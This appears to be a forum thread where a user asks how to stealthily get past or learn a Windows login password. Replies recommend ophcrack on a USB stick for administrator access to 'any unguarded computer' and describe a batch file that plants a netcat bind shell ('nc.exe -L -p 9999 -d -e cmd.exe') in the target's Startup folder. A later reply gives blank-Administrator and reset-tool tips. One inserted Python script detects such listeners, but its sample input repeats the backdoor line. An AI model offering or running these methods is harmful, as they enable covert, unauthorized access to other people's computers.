Hey, I was wondering if there was a way to either find out the password in Windows, or just bypass the logon screen, without making a blank password or changing any settings, just doing it stealth style. Is there a way?
Hi there! (first post here :mean: ) I just did this recently... All you have to do is use ophcrack (just google it). It is a Linux-based live bootable CD, and it works great. What I also did was follow the instructions from http://www.pendrivelinux.com/2007/06/12/creating-a-bootable-usb-ophcrack/ to get it working from a USB flash drive; you'll need at least 512MB, I used a gig. The instructions are fairly simple, but they did neglect to say that you need to decompress the ophcrack live CD ISO file. Just use 7-Zip or similar. Have fun! Now I have a flash drive on my key ring which will give me administrator access to any unguarded computer (running Windows) :pleased:
Do you want to do it remotely? Because ophcrack will only get you the password hashes locally, on the system it's running on. Remember, once you get the hash remotely it is saved as an "NTLM session security" hash; locally it is saved as an "LM & NTLM" hash. As soon as it is "NTLM Session Security", ophcrack and rainbowcrack cannot crack it, because they use an attack called a "cryptanalysis attack" which uses pre-generated tables to crack the password in seconds, and they can only crack "LM", "LMchall", "HALFLMChall", "NTLM", "NTLMChall", "FASTLM", MSCACHE, MD2, MD4, MD5, SHA1, RipeMD 160, MySQL 323, MySQLsha1, CISCOPIX, SHA256, SHA384, SHA512, Oracle, and with the right tool WPA-PSK. So if you do it remotely you will have to use a wordlist or brute force to crack the password. You can always read up on netcat and then write a nice batch file to get you access without needing any user or pass. The batch file will copy netcat from your computer to the target computer once the target computer executes the batch file; then it copies a batch file to the target computer's startup folder, which in turn executes this command with netcat every time the target starts up: nc.exe -L -p 9999 -d -e cmd.exe. So now the moment you telnet to port 9999 on the target computer you will have full rights on there without ever needing a password. But the netcat trick only works if the target computer is on your local network.
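The netcat persistence described in the post above leaves a script in the Startup folder that relaunches a listener bound to cmd.exe on every boot, which is exactly where a defender can look for it. The following Python script is an added example for this thread, not code posted by anyone in it: it walks the Windows Startup folders, reads every script-like file, and flags any line that starts a netcat-family binary with a listen flag and an execute-shell flag, reporting the port. The Startup folder paths are the standard per-user and all-users locations on Vista and later (an assumption; pass other folders as arguments on older systems), and the two sample batch files embedded at the bottom are constructed so the detection can be exercised offline.

```python
"""Audit Windows Startup-folder scripts for netcat-style listeners bound to a shell.

Added example, not code from the thread. Startup folder paths below are assumed
(standard Vista+ layout); the SAMPLE_* batch files are constructed test input.
"""
import os
import re
import sys

# A netcat-family binary name (nc, ncat, netcat, optionally .exe), as a command token
# or at the end of a path such as C:\Windows\Temp\nc.exe.
NC_BINARY = re.compile(r"""(?:^|[\\/\s"'])(nc|ncat|netcat)(?:\.exe)?(?=[\s"']|$)""",
                       re.IGNORECASE)
# Listen flag: -l (listen) or the Windows-only -L ("listen harder", restart after disconnect).
LISTEN_FLAG = re.compile(r"(?:^|\s)-[lL]")
# Port flag, either separate (-p 9999) or folded into a cluster (-lvp 4444).
PORT_FLAG = re.compile(r"(?:^|\s)-\w*p\s*(\d{1,5})")
# -e / -c followed by a shell: the part that turns a plain listener into a remote shell.
EXEC_SHELL = re.compile(
    r"(?:^|\s)-[ec]\s+\S*?(cmd(?:\.exe)?|powershell(?:\.exe)?|(?:ba|z|da)?sh)\b",
    re.IGNORECASE)


def classify_line(line):
    """Return a finding dict if this command line starts a shell-bound netcat listener, else None."""
    if not NC_BINARY.search(line):
        return None
    if not LISTEN_FLAG.search(line):
        return None            # client-mode use of nc (port probe, file transfer) is not flagged
    shell = EXEC_SHELL.search(line)
    if not shell:
        return None            # a bare listener without -e/-c is suspicious but not a shell
    port = PORT_FLAG.search(line)
    return {"port": int(port.group(1)) if port else None,
            "shell": shell.group(1).lower(),
            "line": line.strip()}


def scan_text(text, source="<string>"):
    """Scan script text line by line; return findings tagged with source and line number."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        hit = classify_line(line)
        if hit:
            hit.update(source=source, lineno=lineno)
            findings.append(hit)
    return findings


def scan_startup_folders(folders=None, extensions=(".bat", ".cmd", ".vbs", ".ps1", ".js")):
    """Read every script-like file under the given Startup folders and collect findings."""
    if folders is None:  # assumed standard locations; %VAR% expansion only works on Windows
        folders = [
            os.path.expandvars(r"%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"),
            os.path.expandvars(r"%ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup"),
        ]
    findings = []
    for folder in folders:
        if not os.path.isdir(folder):
            continue
        for root, _dirs, files in os.walk(folder):
            for name in files:
                if name.lower().endswith(extensions):
                    path = os.path.join(root, name)
                    with open(path, "r", encoding="utf-8", errors="ignore") as fh:
                        findings.extend(scan_text(fh.read(), source=path))
    return findings


# Constructed sample: the persistence batch file pattern described in the thread.
SAMPLE_STARTUP_BAT = """@echo off
rem constructed sample, not a real file from any system
copy \\\\fileserver\\share\\nc.exe C:\\Windows\\Temp\\nc.exe
C:\\Windows\\Temp\\nc.exe -L -p 9999 -d -e cmd.exe
"""
# Constructed benign sample: an autostart launcher plus a client-mode nc port probe.
SAMPLE_BENIGN_BAT = """@echo off
rem constructed benign startup script
start "" "C:\\Program Files\\Sync\\sync.exe" --minimized
nc -z 127.0.0.1 3306
"""

if __name__ == "__main__":
    results = scan_startup_folders(sys.argv[1:] or None)
    results += scan_text(SAMPLE_STARTUP_BAT, "constructed-sample.bat")
    results += scan_text(SAMPLE_BENIGN_BAT, "constructed-benign.bat")
    for f in results:
        print(f"{f['source']}:{f['lineno']}: listener on port {f['port']} "
              f"executing {f['shell']}: {f['line']}")
    if not results:
        print("no shell-bound listeners found")
```

Run it as `python audit_startup.py` on a Windows host (or with explicit folder paths on XP-era layouts). The check is deliberately heuristic: it keys on the combination of a netcat binary, a listen flag and an execute flag, so a renamed binary or a listener in the Run registry key rather than the Startup folder would need a separate check; the constructed benign sample shows that ordinary client-mode `nc` use is not flagged.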
Check out the page on this forum under Ethical Hacking, then go to PLEASE REPLY and look at my post; it should help you.
As far as I know, there are two main methods to solve the Windows password problem, as follows. 1st method: Start the system and when you see the Windows Welcome screen / login screen, press [Ctrl]+[Alt]+[Del] twice and it'll show the classic login box. Now type "Administrator" (without quotes) in Username and leave the Password field blank. Now press Enter and you should be able to log in to Windows. Now you can reset your account password from "Control Panel -> User Accounts". The same thing can be done using Safe Mode. In Safe Mode, Windows will show this built-in Administrator account on the login screen. 2nd method: Windows password reset software, for example Windows Password Reset 6.0. Comparatively, it is easier and more convenient to use.